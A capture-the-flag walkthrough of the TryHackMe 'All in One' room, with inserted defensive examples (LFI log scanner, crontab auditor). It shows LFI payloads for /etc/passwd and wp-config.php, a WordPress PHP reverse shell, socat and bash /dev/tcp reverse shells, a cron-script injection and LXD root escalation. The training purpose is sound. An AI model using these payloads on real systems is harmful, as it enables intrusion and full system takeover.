All in One TryHackMe Write-up

Source: TryHackMe

Room: All in One https://tryhackme.com/room/allinonemj

Difficulty: Easy/Medium

Creator: Me, i7m4d

This box is intended to help you practice several ways of exploiting a system. There are a few intended paths to exploit it and a few unintended paths to get root.

What you will see:

  1. Enumeration
  2. Decryption
  3. Reverse shell from WordPress
  4. Finding hidden password
  5. Exploiting LFI
  6. Privilege escalation using SUID
  7. Privilege escalation using cron job
  8. Privilege escalation using LXD

Enumeration:

The first step in almost every box is running an nmap scan.

Command: nmap -p- -A -T4 (ip)

As shown in the nmap scan, there are three open ports:

21: ftp

22: SSH

80: web-server

FTP Port 21:

We can log into FTP using Anonymous as both the username and the password, as shown in the nmap results.

Tip: You can directly log in using only the username Anonymous and hit Enter when prompted for the password.

Command: ftp (ip)

There is nothing useful in FTP, so let's move on.

Web Port 80:

First things first, let's run a directory scan and check whether there are any hidden directories.

Command: gobuster dir -w (wordlist) -u (url)

As shown, we have found two directories:

Wordpress and Hackathons

Heading into the Hackathons page, it says something about hating the smell of vinegar, and looking at the page source reveals an encoded text. The hint on the page probably means we should use Vigenère decoding to decrypt the text, using the keyword under the encoded text as the key. 💭 💭 💭

And yes! We were able to decrypt it and got what looks like a password; we will leave it there for now. By the way, I tried to SSH using the password found, but it was incorrect🤔.
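
The decoding step above, as an added example that is not part of the original write-up: a Vigenère encrypt/decrypt pair in Python. It assumes the usual convention that the key advances only on letters and that non-letters pass through unchanged; the ciphertext and key below are constructed, not the ones in the Hackathons page source.

```python
import string

ALPHABET = string.ascii_uppercase

# Constructed sample (the classic "attack at dawn" / "lemon" pair), not the room's real text.
SAMPLE_CIPHERTEXT = "lxfopv ef rnhr"
SAMPLE_KEY = "lemon"


def _shift(text, key, direction):
    """Shift each ASCII letter by its key letter; non-letters pass through and do not consume key."""
    if not key or not key.isalpha():
        raise ValueError("key must be non-empty and alphabetic")
    key = key.upper()
    out = []
    k = 0  # index into the key; only advances on letters
    for ch in text:
        if ch.upper() in ALPHABET:
            offset = direction * (ord(key[k % len(key)]) - ord("A"))
            base = ord("A") if ch.isupper() else ord("a")  # preserve case
            out.append(chr((ord(ch) - base + offset) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def vigenere_encrypt(plaintext, key):
    """Encrypt with the repeating-key Vigenère cipher."""
    return _shift(plaintext, key, +1)


def vigenere_decrypt(ciphertext, key):
    """Decrypt by shifting each letter back by its key letter."""
    return _shift(ciphertext, key, -1)


if __name__ == "__main__":
    print(vigenere_decrypt(SAMPLE_CIPHERTEXT, SAMPLE_KEY))
```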

Accessing wordpress obviously gave us a WordPress page. Let us run wpscan to check for any vulnerabilities and enumerate users.

Command: wpscan --url (ip)/wordpress -e u

Command: wpscan --url (ip)/wordpress -e ap

  • -e: enumerate
  • u: users
  • ap: all plugins

Looking at the results, we find two vulnerabilities and a username:

  1. Mail Masta, which is vulnerable to LFI (Local File Inclusion)

     Source: https://www.exploit-db.com/exploits/40290

  2. Reflex Gallery (Arbitrary File Upload)

     Source: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload

  3. A username: elyana

Exploitation:

Method 1💭:

Mail Masta (LFI):

A File Inclusion vulnerability allows an attacker to include a file, usually by exploiting a “dynamic file inclusion” mechanism implemented in the target application. The vulnerability occurs because user-supplied input is used without proper validation.

To test for LFI, we will first try to read the user accounts file:

http://ip/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

And yes, it worked: we can see the contents of /etc/passwd.

Now let us try to get the database's config file using:

http://ip/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

We got the config file; it is base64-encoded, and decoding it reveals the WordPress username and password:
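
The defender's view of the two requests above, as an added example that is not part of the original write-up: a small Python scanner that pulls query parameters out of Apache-style access log lines and flags the traversal, absolute-path and php:// wrapper patterns used here. The log lines are constructed to mirror the write-up's requests, not taken from a real server.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines mirroring this write-up's requests (not real logs).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 2317 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2021:10:00:07 +0000] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2021:10:01:00 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 10231 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2021:10:01:03 +0000] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=campaign.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Ordered so the most specific reason wins: wrappers are checked before plain traversal.
LFI_PATTERNS = (
    (re.compile(r"^(?:php|file|data|expect|zip|phar)://", re.I), "PHP stream wrapper"),
    (re.compile(r"(?:^|/)\.\.(?:/|$)"), "directory traversal"),
    (re.compile(r"^/(?:etc|proc|var/log)/"), "absolute system path"),
)


def lfi_indicators(target):
    """Return (param, decoded value, reason) for each query parameter that looks like an LFI probe."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; a second pass catches double-encoding
        for pattern, reason in LFI_PATTERNS:
            if pattern.search(value):
                hits.append((name, value, reason))
                break
    return hits


def scan_log(text):
    """Return (client ip, request target, reason) for every log line carrying an LFI indicator."""
    flagged = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = lfi_indicators(m.group("target"))
        if hits:
            flagged.append((line.split(" ", 1)[0], m.group("target"), hits[0][2]))
    return flagged


if __name__ == "__main__":
    for ip, target, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}  {reason}: {target}")
```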

Now we can just head over, log into WordPress and get a PHP reverse shell. To do so, go to Appearance > Theme Editor, click on 404 Template on the right side, and paste our PHP reverse shell code.

Let us run the file from where it is stored and start netcat to listen for incoming connections.

Executing the file:

http://ip/wordpress/wp-content/themes/twentytwenty/404.php

Command to start netcat: nc -nlvp 9001

We got a shell !!!

Spawn a better shell using: python3 -c 'import pty; pty.spawn("/bin/bash")'

Method 2 (Metasploit)💭:

Reflex Gallery (File upload)

I will leave it up to you to try to exploit it the easier way, using the Metasploit framework.

Privilege Escalation to User:

Now that we have got a shell, let's grab our user.txt !!!

Urm🤔, I guess we can't access user.txt as we do not have permission yet. However, there is a hint file saying that elyana's password is hidden somewhere on the system.

To find it, we will run a find command to see if she owns any file or directory:

Command: find / -user elyana -type f 2>&1 | grep -v "Permission" | grep -v "No such"

Looks like there is a file called private.txt; reading it gives us the password of elyana's user account.😍

Using the password found, we were able to switch to elyana's account. But what more can we do while we own elyana?

Checking elyana's id shows that she is in the sudo and lxd groups. This is interesting!🤯

SSH

Now that we have the user's password, we can SSH in directly and continue with our privilege escalation.

Privilege Escalation to root:

Method 1💭:

Anyway, for now, running sudo -l shows that we can run /usr/bin/socat as root; executing it correctly will give us a shell as root. Let's do it!

On our machine we will run this command: socat file:`tty`,raw,echo=0 tcp-listen:(port)

On elyana's machine we will run this command: sudo socat tcp-connect:(your machine's ip):(port) exec:bash,pty,stderr,setsid,sigint,sane

And we got rooooooot 😍!!

Method 2💭:

Running the LinEnum script, we found some interesting SUID binaries that give us a shell as root when executed.

Manually looking at SUID binaries using the command: find / -perm -u=s -type f 2>/dev/null

We were able to do the second one successfully; let's try the first one now!

By the way, you can look up almost any SUID binary on GTFOBins, which provides an excellent explanation of how you can escalate privileges using it.

Source: https://gtfobins.github.io/

We will run this cute short command that gives us root access, because its permissions are -rwsr-sr-x; in other words, we can execute it and get root.

Command: /bin/bash -p

And once again we are ROOOOOOOOT 😍😍!

Method 3💭:

In this method, we will get a reverse shell as root. This is possible because there is a bash script owned by root that is executed every minute. We can verify this by checking the crontab.

Command: cat /etc/crontab

Looking at the script, it does not really do anything; however, we can once again insert a cute short piece of bash code and we will get a reverse shell.

Inject this reverse shell code into the script: bash -i >& /dev/tcp/ip/port 0>&1

On our machine, start netcat: nc -nlvp 9002

We are roooooooot’in again 😍😍😍!!!
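
The weakness behind Method 3 is a root cron entry that runs a script other users can modify. As an added example that is not part of the original write-up, here is a Python audit that parses system-crontab entries, resolves the executables each root entry runs, and reports any that are missing, not owned by the expected user, or writable by group or others. The crontab text and scripts in demo() are constructed in a temporary directory; the hypothetical names backup.sh and cleanup.sh are not from the room.

```python
import itertools, os, re, stat, tempfile

# A system crontab entry: five time fields (digits, *, ",", "/", "-"), then the user, then the command.
# Comment lines and VAR=value assignments never match, so they are skipped naturally.
CRON_ENTRY = re.compile(r"^(?:[\d*,/-]+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def command_paths(cmd):
    """Absolute paths a cron command executes, stopping at the first redirection, pipe or separator."""
    run = itertools.takewhile(lambda t: t[0] not in ">|&;" and not t.startswith("2>"), cmd.split())
    return [t for t in run if t.startswith("/")]


def script_issues(path, expected_owner=0):
    """Reasons a non-root user could change what this root cron entry runs."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return ["missing: whoever can write the parent directory can create it"]
    issues = []
    if st.st_uid != expected_owner:
        issues.append(f"owned by uid {st.st_uid}, expected {expected_owner}")
    if st.st_mode & (stat.S_IWOTH | stat.S_IWGRP):
        issues.append("writable by group or others")
    return issues


def audit_crontab(text, expected_owner=0):
    """Map each executable referenced by a root entry to its findings; clean entries are omitted."""
    findings = {}
    for line in text.splitlines():
        m = CRON_ENTRY.match(line.strip())
        if not m or m.group("user") != "root":
            continue
        for path in command_paths(m.group("cmd")):
            issues = script_issues(path, expected_owner)
            if issues:
                findings[path] = issues
    return findings


def demo():
    """Constructed scenario: one root entry runs a world-writable script, another a protected one."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "backup.sh"), os.path.join(d, "cleanup.sh")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as f:
            f.write("#!/bin/bash\n")
        os.chmod(path, mode)  # explicit modes so the result does not depend on umask
    crontab = f"SHELL=/bin/sh\n# m h dom mon dow user command\n* * * * * root {bad} > /dev/null 2>&1\n0 3 * * * root {good}\n"
    return audit_crontab(crontab, expected_owner=os.getuid())
```

Run against the real /etc/crontab (and /etc/cron.d/*) with expected_owner=0; the same check applies to any interpreter path a cron line names, since a writable /bin/bash would be just as bad as a writable script.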

Method 4💭:

Remember when we saw that elyana was in the lxd group? Yup, this is when it comes in handy, and we will exploit it like nothing!

To do so, we will first download the LXD Alpine builder, create an image, upload the file to the victim using a Python web server, then import and execute the image.

Download the repo using git on your machine and build the image:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

After creating it, upload it to the victim using the Python server.

On your machine: sudo python -m SimpleHTTPServer

On the victim machine: go to the tmp directory and get the tar using

wget http://(your machine ip):8000/********.tar.gz

Now that we have got the file, we will add it as an image to LXD using:

lxc image import ./******************.tar.gz --alias alpine

List the lxc images to see if it was imported successfully like so:

lxc image list

Yup, it is imported. Now we just have to launch it like so and then navigate to /mnt/root to see the system's files (the image name must match the alias we imported above):

lxc init alpine ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

id

/mnt/root/root

And guess what again? Yeah Yeah we just got root using LXD 😍😍😍😍 !!!

Finally, the user.txt and root.txt are base64-encoded; go ahead and decode them, and submit your flags 🚩🚩🚩!

This was a fun box, to be honest, and it contains some of the most important ways of exploiting a system. I enjoyed creating the box and writing it up. It took me three to four days to complete everything, so pardon me if I have made any silly mistakes.😎

Thank you for reading and I hope you have enjoyed this room and post 👏🏻 !

Another write up by me😎: https://medium.com/@i7m4d/bounty-hacker-write-up-tryhackme-4afca1389f5a